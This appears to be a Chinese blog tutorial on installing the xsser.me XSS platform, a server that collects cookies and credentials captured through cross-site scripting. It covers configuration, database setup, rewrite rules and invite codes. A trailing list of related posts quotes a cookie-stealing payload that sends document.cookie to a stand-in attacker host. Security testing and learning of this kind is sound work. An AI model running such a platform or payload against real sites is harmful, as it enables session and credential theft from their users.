XSS平臺搭建(xsser.me)

阿新 • • 發佈：2017-06-15

nor 就會 urn nginx 會有靜態 update attr mes

一、下載源碼

地址: http://download.csdn.net/detail/u011781521/9722570

下載之後解壓出來會有這麽些文件

技術分享

把這些文件復制到網站目錄xsser中

技術分享

二、配置環境

步驟：

1、修改config.PHP裏面的數據庫連接字段，包括用戶名，密碼，數據庫名，訪問URL起始和偽靜態的設置。

技術分享

1.1在phpmyadmin中新建xssplatform數據庫

技術分享

1.2修改訪問的url起始地址為:http://localhost/xsser 也就是目錄名

技術分享

2、在web根目錄下有一個xssplatform.sql，在phpmyadmin中創建好數據庫後導入庫。

2.1phpmyadmin導入SQL

技術分享

執行之後會多出9張表

技術分享

3、進入數據庫執行語句修改域名為自己的：

UPDATE oc_module SET
code=REPLACE(code,‘http://xsser.me‘,‘http://localhost/xsser‘)

技術分享

4.修改themes\default\templates\register.html中的提交按鈕的源碼為：註如果修改了下面註冊的頁面就不用修改了!!

行53
<input id="btnRegister" type="button" onclick="Register()" value="提交註冊" />

修改為
<input id="btnRegister" type="submit" value="提交註冊" />

5.登錄頁面，回車登錄；加載完頁面後，自動將光標定位在user輸入框

文件themes/default/templates/login.html的修改：

[html] view plain copy

<input type="submit" value="登錄" onclick="Login()">

在body的最後添加：

[html] view plain copy

<script>document.getElementById(‘user‘).focus();</script>

技術分享

6.修改提示頁面跳轉時間為500ms

文件themes/default/templates/notice.html：

行11

setTimeout("location.href=‘{$notice.turnto}‘",3000);

修改為

setTimeout("location.href=‘{$notice.turnto}‘",500);

技術分享

7.創建項目頁面，自動將光標置於項目名稱處

themes/default/templates/project_create.html

行55，添加

技術分享

8.rewrite規則

在web根目錄下建立.htaccess偽靜態文件

技術分享

並加入以下內容、註意如果偽靜態沒配置成功，那麽下面xsser生成的項目中的URL將不能訪問!!!

範例：

Apache：

[html] view plain copy

RewriteEngine On
RewriteRule ^([0-9a-zA-Z]{6})$ /xsser/index.php?do=code&urlKey=$1 [L]
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ /xsser/index.php?do=do&auth=$1&domain=$3 [L]
RewriteRule ^register/(.*?)$ /xsser/index.php?do=register&key=$1 [L]
RewriteRule ^register-validate/(.*?)$ /xsser/index.php?do=register&act=validate&key=$1 [L]
RewriteRule ^login$ /xsser/index.php?do=login [L]

Nginx：

[html] view plain copy

rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last;
rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" /index.php?do=do&auth=$1&domain=$3 last;
rewrite "^/register/(.*?)$" /index.php?do=register&key=$1 last;
rewrite "^/register-validate/(.*?)$" /index.php?do=register&act=validate&key=$1 last;

三、使用

差不多了，我們訪問這個地址:http://localhost/xsser/index.php

技術分享

在註冊之前、首先把註冊配置修改為normal進行保存

技術分享

然後就可以註冊了、邀請碼隨便填寫，其他的都是註冊的時候需要的

技術分享

點擊提交註冊，發現沒卵用，他這搞錯了，審查下元素，就能發現，他把type=submit寫成了type=button，改回來就可以了。

技術分享

就完成了註冊。註冊成功之後他會跳到這個頁面

技術分享

然後我們到數據庫中的user表裏面

技術分享

把adminLevel修改為1，把自己定義為最高管理員權限，不然沒法發送邀請碼。再回到config.php中，修改註冊配置為invite

技術分享

保存後我們重新登陸進去生成邀請碼

http://localhost/xsser/index.php?do=user&act=invite

技術分享

點擊生成其他邀請碼

技術分享

93cd389730d7e601f0dc6ec5a6992d69

生成，成功，現在來看看可以正常註冊不

技術分享

修改type=submit、然後點擊提交註冊

技術分享

註冊成功。

四、測試

新建一個項目、測試其中的地址

技術分享

點擊下一步

技術分享

點擊下一步創建完成。

技術分享

能訪問:

技術分享

說明Apache偽靜態配置成功、如果偽靜態沒有配置成功就會出現下面的錯誤

技術分享

XSS平臺搭建(xsser.me)

nor 就會 urn nginx 會有靜態 update attr mes 一、下載源碼地址: http://download.csdn.net/detail/u011781521/9722570 下載之後解壓出來會有這麽些文件把這些文件復制到網站目

XSS平臺搭建

normal xss () src 靜態邀請碼 config url ces 簡介：在實施xss攻擊的時候，需要有一個平臺用來收集攻擊獲得獵物（cookie，用戶名密碼等）；xss平臺就是這樣一個用於收取cookie，賬號等信息的平臺；可以使用外網的xss平臺來測試外網

從零開始搭建輕量級個人XSS平臺

提示不可應用編輯狀態 red rip 權限以及 signature 一、前言決定搭建XSS平臺是因為自己想深入學習一下XSS相關的知識，多多進行實踐，上網搜索了一下XSS平臺有很多，但是總覺得不是很安全，這個畢竟敏感信息要傳輸到陌生人的服務器上，而且服務器端測試

XSS測試平臺搭建

安裝（1）安裝http server與php環境（ubuntu: sudo apt-get install apache2 php5 或 sudo apt-get install apache2 php7.0 libapache2-mod-php7.0）（2）上傳所有檔案至空

XSS學習筆記（三）-XSS平臺的搭建

接著前兩篇來的，攻擊者可以通過一個普通使用者登入進來，然後在輸入框中提交以下資料：<a href=# onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(documen

zabbix 監控平臺搭建過程中的報錯與解決方法總結

監控 zabbix 運維自動化1.php option post_max_size 2.php option max_execution_time 3.php option max_input_time 4.php time zone 5.php bcm

小型電商服務器平臺搭建（一）

服務器 idc機房運行環境阿裏雲雲平臺一、阿裏雲小型電商服務平臺架構介紹電商平臺初創之初，訪問量不大，但將來可能訪問量暴增，初期階段業務模式調整頻繁，對價格敏感，因此希望服務器平臺架構具有良好的功能拓展性及性能伸縮性，所有平臺軟件最好免費，且性能滿足將來發展，具有冗余高可用設計，平

小程序商城系統開發模式平臺搭建詳解

小程序效果商機應用場景模式找到成本時代哪些小程序商城系統開發(李想.185.6504.8478)隨著移動互聯網的深入普及，流量碎片化的趨勢無法逆轉，百度、淘寶等平臺成本越來越高，效果卻越來越差，企業單一流量入口保持增長的時代結束。小程序二維碼多入口的訪問形

cacti平臺搭建rrdtool解決方法

cacti rrdtool改正註：cacit rrdtool實驗中稍有錯誤導致make編譯錯誤經過實驗給大家加以改正一、準備環境，兩臺電腦一個服務器，一個測試機在第一臺電腦（服務器）1、安裝gcc*yum -y install gcc*再裝工具包 yum -y install mysql mysql-ser

基於rhel7.2的Zabbix平臺搭建和部署（一）

linux 監控軟件 zabbix nginx mysql php lnmp基於rhel7.2的zabbix平臺搭建和部署（一）一、實驗環境：（1）虛擬機：rhel7.2 x86_64（2）數據庫：mysql5.7.13（3）nginx1.10.2（4）PHP5.6.27（5）zabbix二、安裝編譯工具及

基於 Arduino 和 IoT 雲平臺搭建物聯網系統

來看需要 padding .... nal maker post 分層結構 car 在這篇文章中，我們將介紹如何搭建一款監測土壤水分的物聯網系統，用於在土壤幹燥時發出警報，提醒用戶。本項目使用了IoT 雲平臺來管理警報系統，同時存儲來自傳感器的數據。眾所周知，物聯網是當今

基於rhel7.2的Zabbix平臺搭建和部署（四）

linux 監控軟件 zabbix nginx mysql php lnmp基於rhel7.2的Zabbix平臺搭建和部署（四）一、實現zabbix添加監測項，添加對Linux主機的監控、說明：先在“配置”-“主機”裏添加主機監控，監控os資源：內存，cpu，io，負載，帶寬等.（1）登錄zabbix，先在

開源日誌分析系統ELK平臺搭建部署

logstash 日誌分析系統 elk 開源日誌分析系統ELK平臺搭建部署一、前言日誌主要包括系統日誌、應用程序日誌和安全日誌。系統運維和開發人員可以通過日誌了解服務器軟硬件信息、檢查配置過程中的錯誤及錯誤發生的原因。經常分析日誌可以了解服務器的負荷，性能安全性，從而及時采取措施糾正錯誤。通常

hadoop_hive_zookeeper_kafka_spark平臺搭建

之間 park 使用地址階段 sel gin 關閉selinux 其他 1. 搭建linux集群一般在學習測試階段最小的節點數是3個節點，因此在虛擬機中安裝3個節點。我使用的虛擬機環境是VMware10，linux系統是64位 Centos 6.5 minimal版本

棋牌平臺搭建教程-德州撲克算法詳解

棋牌德州撲克是一種技巧性非常強的撲克遊戲，有一定的運氣成分，但玩家之間主要還是要靠鬥智力、耍手腕、動腦筋。其規則非常簡單，比較容易掌握，但是要達到精通的境界卻有一定的難度。我們可以定義一個枚舉來羅列出所有的牌型：[cpp] view plain copy//牌的類型枚舉 enum CardTyp

網狐棋牌源碼搭建問題難點棋牌平臺搭建下載教程

mfc 桌子 dll 不知道使用清晰網絡庫 ket 客戶網狐框架雖然功能復雜繁多，但總體框架還是很清晰的。服務器端主要包裹： 1.登錄服務器唯一一個，啟動時需要連接中心服務器。中轉玩家的消息，相當於別的遊戲服務器的gate。 2.中心服務器全局服務器，登陸服務器

多款精美UI推薦蛟龍出海3D電玩城遊戲廳模式平臺搭建開發

蛟龍出海 3D電玩城生活是什麽，生活是一出戲劇，是一次歷險，是一個夢境，是一個幻覺？其實生活就是西西弗斯不斷重復地推大石頭上山頂的過程。蛟龍出海遊戲模式定制開發蛟龍出海手機APP模式定制開發蛟龍出海三端通定制開發公司還有很多正在開發還未上線的新模式項目

ELK平臺搭建部署

錯誤 lte pre sof ror span arch 軟件 onf 1、獲取軟件: 2、安裝elasticsearch 修改幾個文件: 2.1、/etc/security/limits.conf: * soft nproc

Jenkins Gitlab持續集成打包平臺搭建

定時器占用 max ner run 後臺 nvi 所有 devops http://www.cnblogs.com/skyseraph/p/5695021.html 1. 相關概念 Jenkins Jenkins，一個用Java編寫的開源的持續集成工

GourdScanV2 SQL被動掃描平臺搭建

es2017 .com 出錯更改 foo com install 使用 /usr 項目地址：https://github.com/ysrc/GourdScanV2 搭建環境：Kali Linux 1.首先安裝redis-server root@kali:~# apt-g

XSS平臺搭建(xsser.me)

相關推薦